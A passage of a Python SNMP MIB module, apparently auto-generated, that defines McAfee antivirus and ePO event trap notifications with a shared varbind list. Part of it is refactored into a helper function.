mcafee_EVENT_UPDATEOK = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1118)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPDATEFAILED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1119)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPDATE_RUNNING = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1120)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_UPDATECANCELED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1121)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
# McAfee event notifications (auto-generated MIB trap definitions).
# Every trap in this family is rooted at the same OID prefix
# (1.3.6.1.4.1.3401.12.0) + (0, <trap-id>) and carries the identical
# varbind list, so both are factored out once instead of being repeated
# verbatim on every definition.

# Varbind objects attached to every mcafee_EVENT_* notification below,
# in the exact order the original definitions passed them to setObjects().
_MCAFEE_EVENT_OBJECTS = (
    ("NAI-MIB", "naiTrapAgent"),
    ("NAI-MIB", "naiTrapShortDescription"),
    ("NAI-MIB", "naiTrapSeverity"),
    ("TVD-MIB", "mcafee_SOURCEIP"),
    ("TVD-MIB", "mcafee_GMTTIME"),
    ("NAI-MIB", "naiTrapAgentVersion"),
    ("NAI-MIB", "naiTrapLongDescription"),
    ("NAI-MIB", "naiTrapProblemResolution"),
    ("NAI-MIB", "naiTrapDiagID"),
    ("NAI-MIB", "naiTrapURL"),
    ("NAI-MIB", "naiTrapSourceDNSName"),
    ("TVD-MIB", "mcafee_TIME"),
    ("TVD-MIB", "mcafee_TARGETIP"),
    ("NAI-MIB", "naiTrapTargetDNSName"),
    ("TVD-MIB", "mcafee_TRAPID"),
    ("TVD-MIB", "mcafee_ENGINEVERSION"),
    ("TVD-MIB", "mcafee_DATVERSION"),
    ("TVD-MIB", "mcafee_ENGINESTATUS"),
    ("TVD-MIB", "mcafee_VIRUSNAME"),
    ("TVD-MIB", "mcafee_VIRUSTYPE"),
    ("TVD-MIB", "mcafee_FILENAME"),
    ("TVD-MIB", "mcafee_USERNAME"),
    ("TVD-MIB", "mcafee_OS"),
    ("TVD-MIB", "mcafee_PROCESSORSERIAL"),
    ("TVD-MIB", "mcafee_NUMVIRS"),
    ("TVD-MIB", "mcafee_NUMCLEANED"),
    ("TVD-MIB", "mcafee_NUMDELETED"),
    ("TVD-MIB", "mcafee_NUMQUARANTINED"),
    ("TVD-MIB", "mcafee_SCANRETURNCODE"),
    ("TVD-MIB", "mcafee_MAILFROMNAME"),
    ("TVD-MIB", "mcafee_MAILTONAME"),
    ("TVD-MIB", "mcafee_MAILCCNAME"),
    ("TVD-MIB", "mcafee_MAILSUBJECTLINE"),
    ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"),
    ("TVD-MIB", "mcafee_LANGUAGECODE"),
    ("TVD-MIB", "mcafee_CLIENTCOMPUTER"),
    ("TVD-MIB", "mcafee_TSCLIENTID"),
    ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"),
    ("TVD-MIB", "mcafee_NOTEID"),
    ("TVD-MIB", "mcafee_NOTESSERVERNAME"),
    ("TVD-MIB", "mcafee_NOTESDBNAME"),
    ("TVD-MIB", "mcafee_DOMAIN"),
    ("TVD-MIB", "mcafee_OBRULE"),
    ("TVD-MIB", "mcafee_EVENTNAME"),
)


def _mcafee_event(trap_id):
    """Build a NotificationType at 1.3.6.1.4.1.3401.12.0.0.<trap_id>.

    Each notification carries the standard McAfee event varbind list
    (_MCAFEE_EVENT_OBJECTS); unpacking the tuple reproduces the original
    per-object positional setObjects() call exactly.
    """
    return NotificationType(
        (1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0, trap_id)
    ).setObjects(*_MCAFEE_EVENT_OBJECTS)


mcafee_EVENT_UPGRADE_RUNNING = _mcafee_event(1122)
mcafee_EVENT_UPGRADE_FAILED = _mcafee_event(1123)
mcafee_EVENT_UPGRADE_CANCELED = _mcafee_event(1124)
mcafee_EVENT_UPDATE_VERSION_OLDER = _mcafee_event(1125)
mcafee_EVENT_SCAN_CANCELED_BY_UPD = _mcafee_event(1126)
mcafee_EVENT_SCANNER_DISABLED = _mcafee_event(1127)
mcafee_EVENT_START_PROCESS = _mcafee_event(1200)
mcafee_EVENT_PROCESS_ENDED = _mcafee_event(1201)
mcafee_EVENT_ODS_SCAN_STARTED = _mcafee_event(1202)
mcafee_EVENT_ODS_SCAN_ENDED = _mcafee_event(1203)
mcafee_EVENT_SCAN_REPORT_OS = _mcafee_event(1204)
mcafee_EVENT_MAIL_VIRUSCLEANED = _mcafee_event(1500)
mcafee_EVENT_MAIL_VIRUSQUARANTINED = _mcafee_event(1501)
mcafee_EVENT_MAIL_VIRUS_NOTCLEANED = _mcafee_event(1502)
mcafee_EVENT_MAIL_VIRUS_DETECTED = _mcafee_event(1503)
mcafee_EVENT_MAIL_VIRUS_DELETED = _mcafee_event(1504)
mcafee_EVENT_MAIL_VIRUS_FILTERED = _mcafee_event(1505)
mcafee_EVENT_MAIL_CONTENTBLOCK = _mcafee_event(1506)
mcafee_EVENT_MAIL_LOWDISKLIMIT = _mcafee_event(1507)
mcafee_EVENT_MAIL_UPPERDISKLIMIT = _mcafee_event(1508)
mcafee_EVENT_MAIL_SERVICE_START = _mcafee_event(1509)
mcafee_EVENT_MAIL_SERVICE_SHUTDOWN_OK = _mcafee_event(1510)
mcafee_EVENT_MAIL_SERVICE_ABEND = _mcafee_event(1511)
mcafee_EVENT_MAIL_SERVICE_MAX_LOAD = _mcafee_event(1512)
mcafee_EVENT_MAIL_VIRUS_QUARANTINEDCLEANED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1513)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MAIL_VIRUS_QUARANTINED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1514)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_NEW_MIB = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1900)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_FAILE_INSTPRODUCT = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2201)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_AGENT_RETRYLIMIT = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2202)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_AGENT_DISKSPACE = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2204)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_SPIPE_DISKSPACE = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2208)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", 